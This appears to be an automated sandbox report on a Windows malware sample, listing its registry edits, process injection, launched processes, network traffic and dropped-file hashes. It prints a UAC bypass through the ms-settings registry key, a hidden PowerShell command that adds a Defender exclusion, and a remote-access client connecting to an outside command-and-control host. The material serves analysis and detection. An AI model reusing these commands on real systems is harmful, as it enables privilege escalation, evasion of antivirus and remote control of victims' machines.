Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings\shell C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings\shell\open\command\ = "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\\Users\\Admin\\AppData\\Local\\Temp\\LHost\\hDvkdxlbo.exe'" C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "152" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\ms-settings\shell\open\command\DelegateExecute C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A
Key created \REGISTRY\USER\S-1-5-21-4176143399-3250363947-192774652-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\explorer.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\explorer.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3872 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 3872 wrote to memory of 3840 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\explorer.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 4024 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3872 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe
PID 3872 wrote to memory of 3664 N/A C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe C:\Windows\System32\ComputerDefaults.exe
PID 3664 wrote to memory of 2752 N/A C:\Windows\System32\ComputerDefaults.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe
PID 3664 wrote to memory of 2752 N/A C:\Windows\System32\ComputerDefaults.exe C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe

"C:\Users\Admin\AppData\Local\Temp\d7dea9816b882cb53d615a3afdf0c955.exe"

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" Client line-ellis.gl.at.ply.gg 10735 nAChhjAnR

C:\Windows\System32\ComputerDefaults.exe

"C:\Windows\System32\ComputerDefaults.exe"

C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe

"PowerShell.exe" -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\LHost\hDvkdxlbo.exe'

C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe

"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 404 -p 4276 -ip 4276

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4276 -s 3760

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 452 -p 4776 -ip 4776

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4776 -s 4048

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 536 -p 2996 -ip 2996

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2996 -s 3568

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 540 -p 1612 -ip 1612

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1612 -s 3532

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -pss -s 496 -p 4728 -ip 4728

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 4728 -s 3612

C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe

"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca

Network

Country Destination Domain Proto
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
US 8.8.8.8:53 line-ellis.gl.at.ply.gg udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 160.252.72.23.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp
US 8.8.8.8:53 12.173.189.20.in-addr.arpa udp
US 147.185.221.16:10735 line-ellis.gl.at.ply.gg tcp

Files

memory/3872-133-0x000001D867990000-0x000001D8679BE000-memory.dmp

memory/4024-134-0x0000000000400000-0x0000000000418000-memory.dmp

memory/3872-135-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/4024-137-0x0000000075330000-0x0000000075AE0000-memory.dmp

memory/4024-138-0x00000000058B0000-0x0000000005942000-memory.dmp

memory/3872-139-0x000001D8697C0000-0x000001D8697D0000-memory.dmp

memory/4024-140-0x0000000005950000-0x00000000059EC000-memory.dmp

memory/4024-141-0x00000000033B0000-0x00000000033C0000-memory.dmp

memory/4024-142-0x00000000060B0000-0x0000000006654000-memory.dmp

memory/4024-145-0x0000000006660000-0x00000000066C6000-memory.dmp

memory/4024-153-0x0000000006920000-0x0000000006970000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lgxgid20.pmp.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2752-158-0x00000267F97B0000-0x00000267F97D2000-memory.dmp

memory/2752-160-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/2752-162-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/2752-163-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/2752-164-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/2752-165-0x00000267F97A0000-0x00000267F97B0000-memory.dmp

memory/3840-167-0x0000000003120000-0x0000000003121000-memory.dmp

memory/4276-173-0x000001F94D5D0000-0x000001F94D5F0000-memory.dmp

memory/3872-174-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/4276-176-0x000001F94D590000-0x000001F94D5B0000-memory.dmp

memory/4276-181-0x000001F94DBA0000-0x000001F94DBC0000-memory.dmp

memory/4024-185-0x0000000075330000-0x0000000075AE0000-memory.dmp

memory/2752-188-0x00007FFC2C850000-0x00007FFC2D311000-memory.dmp

memory/3872-189-0x000001D8697C0000-0x000001D8697D0000-memory.dmp

memory/4024-190-0x00000000033B0000-0x00000000033C0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133352448772131836.txt

MD5 1813dd442ceacc789193d494f5950c47
SHA1 aefaec9cba5ee871851ce3fc2f2e5a00e3373f19
SHA256 d5024835c416b9b1f969c5120d1ca847509732b3915133941aa1cefa92930b97
SHA512 838d5df67f65c04a57fa4be60a4b8a47e3517c01ecf62600cf91c76ce269a83e3677a8ea655e42a8d8f2a11c8d92f8ea0bcdb599a4809e8255eae68049273504

C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

memory/4776-203-0x0000018B8D500000-0x0000018B8D520000-memory.dmp

memory/4776-207-0x0000018B8D1B0000-0x0000018B8D1D0000-memory.dmp

memory/4776-209-0x0000018B8D8C0000-0x0000018B8D8E0000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\7ZZHJ0NR\microsoft.windows[1].xml

MD5 75fdba27ae111f9312c9b243a5e22d02
SHA1 0bbbf13546b05600dbeb285609adcff5e12c2e24
SHA256 62198536b21cc7cad5b396303999bb4ad75ad784e120525be4b8b8a503f05d89
SHA512 855ad3a011f011fc715020029dfce87fd1812bd6d94b5aafdc731b591fe24c681048009427d22da931fc13a1b7cdbca5e8336a79f03d6e226d9984118f2a306c

memory/2996-235-0x00000196A4E40000-0x00000196A4E60000-memory.dmp

memory/2996-238-0x00000196A4E00000-0x00000196A4E20000-memory.dmp

memory/2996-241-0x00000196A52B0000-0x00000196A52D0000-memory.dmp

memory/1612-253-0x0000024AC1CB0000-0x0000024AC1CD0000-memory.dmp

memory/1612-256-0x0000024AC1C70000-0x0000024AC1C90000-memory.dmp

memory/1612-259-0x0000024AC2080000-0x0000024AC20A0000-memory.dmp

memory/4728-274-0x000001B2DF560000-0x000001B2DF580000-memory.dmp

memory/4728-277-0x000001B2DF520000-0x000001B2DF540000-memory.dmp

memory/4728-279-0x000001B2DF930000-0x000001B2DF950000-memory.dmp

memory/4728-288-0x000001AADE000000-0x000001AADE77A000-memory.dmp

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}_charmap_exe

MD5 406347732c383e23c3b1af590a47bccd
SHA1 fae764f62a396f2503dd81eefd3c7f06a5fb8e5f
SHA256 e0a9f5c75706dc79a44d0c890c841b2b0b25af4ee60d0a16a7356b067210038e
SHA512 18905eaad8184bb3a7b0fe21ff37ed2ee72a3bd24bb90cbfcad222cf09e2fa74e886d5c687b21d81cd3aec1e6c05891c24f67a8f82bafd2aceb0e0dcb7672ce7

C:\Users\Admin\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_AutoGenerated_{0A6AC72E-ED8C-C16F-38B6-05831557CF24}

MD5 8aaad0f4eb7d3c65f81c6e6b496ba889
SHA1 231237a501b9433c292991e4ec200b25c1589050
SHA256 813c66ce7dec4cff9c55fb6f809eab909421e37f69ff30e4acaa502365a32bd1
SHA512 1a83ce732dc47853bf6e8f4249054f41b0dea8505cda73433b37dfa16114f27bfed3b4b3ba580aa9d53c3dcc8d48bf571a45f7c0468e6a0f2a227a7e59e17d62